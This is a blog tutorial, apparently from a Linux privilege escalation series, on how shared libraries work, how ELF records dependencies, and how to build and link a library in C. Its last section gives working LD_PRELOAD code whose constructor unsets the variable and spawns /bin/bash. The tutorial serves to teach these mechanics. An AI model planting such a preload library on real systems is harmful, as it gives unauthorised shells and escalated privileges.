Understanding Concept of Shared Libraries

Get in-depth knowledge of shared libraries in Linux and how it is actually used via a practical approach. Build your first library and use it in the code. In this you will also realize how dangerous LD_PRELOAD environment variable is

Understanding Concept of Shared Libraries

Till now in the Linux Privilege Escalation series, you have learnt basic concepts and exploitation on ubiquitous binaries on the Linux machine. From now onwards things will get a little dirty as the concepts will get a little tougher to the novice. If something is not clear or looks vague to you, contact me and get them cleared

Any program you see in Linux is either written in C or C++, even your high-level programming languages like Java, Python, etc. To make it simple and modular, the developers write their libraries or use external libraries written by other developers, using their knowledge in the application to save time.

Shared vs Static Libraries

There are two types of libraries

  • Static Libraries (aka archive)
  • Shared Libraries

As the name suggests, static libraries are incorporated in the code and make the executable bulky. Since they are shipped with the executables, load time is pretty fast, but if there is any bug reported in the library code, it is difficult to distribute the patch as the developer have to rebuild the entire application(s) using that library and distribute the new version of all the application. The extension of static libraries is .a

Shared libraries are independently installed on the system or provided by the developers in separate files but are not embedded in the executable. The load time would be fairly slower than a static library but they are way too modular and easy to distribute as the original developer of the library will fix the code and provide information on how to use the path. The extension of shared libraries is .so

In this post, I will be focusing on the concepts of shared libraries. If you want to learn more about how it works and how you should be using it, I will start another series and write posts on Linux/Windows System Programming. The concept is the same in both the operating system only file type and environment changes

ELF File Format and Library Search Order

When you create an executable with a shared library, a specific program header gets injected into the ELF file .dynamic which contains information about the library to load. To get the list of dependent libraries you can either use ldd or readelf utilities. To know more about ELF format, you should read the Wikipedia page https://en.wikipedia.org/wiki/Executable_and_Linkable_Format. If you are as lazy as me, the following pic from the same wiki will be pretty helpful

But before actually looking forward you must know how an executable finds the library before actually loading.

On the left side, there is a library search order. The very first one has high priority and the last one has the least priority. What it means is that, if your library is found in LD_LIBRARY_PATH environment variables, it will stop searching for it there itself and load it.

Now how a program knows whether it has to load this library or not. Well, that's what the .dynamic section do. It has the exact name of the library to be loaded and when the name of the library in the search directory matches with what is in the dynamic section, it immediately loads it.

Also if the library is not found in /lib and /usr/lib the loader will throw an error something like "shared library <name> not found"

$ ls -l app 
-rwxr-xr-x 1 root root 16200 Aug  9 00:34 app
$ ldd app 
        linux-vdso.so.1 (0x00007ffde1bef000)
        libc.so.6 => /usr/lib/libc.so.6 (0x00007fa203d80000)
        /lib64/ld-linux-x86-64.so.2 => /usr/lib64/ld-linux-x86-64.so.2 (0x00007fa203f7e000)
$ readelf -d app 

Dynamic section at offset 0x2df8 contains 26 entries:
  Tag        Type                         Name/Value
 0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]
 0x000000000000000c (INIT)               0x1000
 0x000000000000000d (FINI)               0x12b8
 ---------------- trimmed ------------------

The command readelf -d app will give you the list of content in the .dynamic section. Whereas ldd app specifically found the list of shared libraries required by executable and also the location of the file from the search order

There is a library linux-vsdo.so.1, which should be ignored from the infosec point of view as it is automatically mapped by the kernel into user-space applications. Read more about it here

To know how the loading works, you can run the command by passing the runtime environment variable LD_DEBUG=libs

$ LD_DEBUG=libs ./app 2>&1  | tr -s " "
 154979:        find library=libc.so.6 [0]; searching
 154979:         search cache=/etc/ld.so.cache
 154979:         trying file=/usr/lib/libc.so.6
 154979:
 154979:
 154979:        calling init: /lib64/ld-linux-x86-64.so.2
 154979:
 154979:
 154979:        calling init: /usr/lib/libc.so.6
 154979:
 154979:
 154979:        initialize program: ./app
 154979:
 154979:
 154979:        transferring control: ./app
 154979:
o
 154979:
 154979:        calling fini: ./app [0]
 154979:
++++o++++
+++ooo+++
++ooooo++
+ooooooo+
ooooooooo

Now on the right side, you will see something called a "symbol". Well, a symbol could be any variable or function name defined in the library that our executable is using. And that makes sense, before loading the library into memory, a program can't use the code defined by the library.

Creating and Using Shared Libraries

Before moving towards creating a library. Let's know about two the following components

  • The library itself
  • The header file

You already know that the library contains the definition of the symbols that would be in the executable file but during development how the developer will know what is the name of the symbol, its a function or variable, etc. For that, the signature of the symbols is defined in the header files which is also known as prototyping or declaration

So let's start by creating a simple library that would contain function greet() with char [] parameter and void return type. In the following code, I have created a header file with the specifications regarding the function.

#ifndef GREET_H
#define GREET_H

extern void greet(char name[]);

#endif
greet.h

Extern is a keyword in C programming language which is used to declare a global variable that is a variable without any memory assigned to it. It is used to declare variables and functions in header files

Now it's time to define the implementation of the greet function. That would be done in the following file

#include <stdio.h>

void greet(char name[]) {
	printf("Hello, %s!\n", name);
}
greet.c

After you have sufficient code for building your library, it's now time to call GCC and built the so file. For simplicity, I have will create the library in the /usr/lib directory. You can use a low privileged user and LD_LIBRARY_PATH environment variable. This will give you exposure to library search order

gcc -shared -fPIC -o /usr/lib/libgreet.so greet.{h,c}

In the above command -shared is used to tell GCC that we want you to create a shared library out of the code supplied to you. If this is omitted, it will try to look for the main function and build an ELF executable.

Please note the name of the library, it starts with lib. All the libraries should start with lib and while providing the name to the GCC build command, you need to pass -l<name without lib and extension>

Let's see this in action after writing code for the executable binary below

#include <stdio.h>
#include "greet.h"

int main() {
        char name[20];
        scanf("%20s", name);
        greet(name);
        return 0;
}
main.c

It's now time to build the application for our use

As you can see, even while the linking phase, the linker could not find libgreet.so name in the search order. To fix this, you must pass the name of the library to the linker. Since the library is shared, the name will be added in the .dynamic section of the program header. To fix this you must pass the library -lgreet

$ gcc main.c -o app -lgreet

Now if you would run the ldd command on the binary. It will show you all the libraries along with our custom libgreet

$ ldd ./app 
        linux-vdso.so.1 (0x00007ffc6f90d000)
        libgreet.so => /usr/lib/libgreet.so (0x00007f31b7ca1000)
        libc.so.6 => /usr/lib/libc.so.6 (0x00007f31b7ad5000)
        /lib64/ld-linux-x86-64.so.2 => /usr/lib64/ld-linux-x86-64.so.2 (0x00007f31b7cd8000)

Also, readelf will show the name of the library in needed section

$ readelf -d app  | grep -E "(NEEDED|OPTIONAL)"
 0x0000000000000001 (NEEDED)             Shared library: [libgreet.so]
 0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]

Using LD_PRELOAD to Execute Malicious Code

Like you have the main function in the executable program, for the libraries, there are entry and exit functions that are executed while loading and unloading the library.

  • _init
  • _fini
  • __attribute__((constructor))
  • __attribute__((destructor))

The first two are obsolete and dangerous but still supported as backwards compatibility. I would rather encourage you to use the last two. In which most of the time you will be required to use __attribute__((constructor))

This attribute is specified just after or before the name of function prototyping and then defining the function.  

#include <stdio.h>

void enter()__attribute__((constructor));
void exit()__attribute__((destructor));

void enter() {
	printf("library loaded\n");
}


void exit() {
	printf("library unloaded\n");
}

Now after recompiling the library code and executing the same binary you will see when and how the library constructor and destructor are called

$ sudo gcc -shared -fPIC -o /usr/lib/libgreet.so greet.{h,c}
$ ./app 
library loaded
tbhaxor
Hello, tbhaxor!
library unloaded

Now what bad actors do is, try to load the library using the LD_PRELOADenvironment path and while doing so you don't have to follow the naming convention. Let's see this also in action

The exploit code is as follows

#include <stdlib.h>

void shell()__attribute__((constructor));

void shell() {
        unsetenv("LD_PRELOAD");
        system("/bin/bash");
}

In this code, everything looks familiar except unsetenv("LD_PRELOAD") when you will omit this line, the child process from the system call will inherit the LD_PRELOAD and keep on calling the exploit.so recursively unless your memory is filled.

A trivia for you, I tried this in my PC and withing few seconds it filled all my RAM and swap memory infinitely spawning /bin/bash processes. For more information read this question – https://security.stackexchange.com/questions/205562/why-in-ld-preload-exploit-we-call-unsetenvld-preload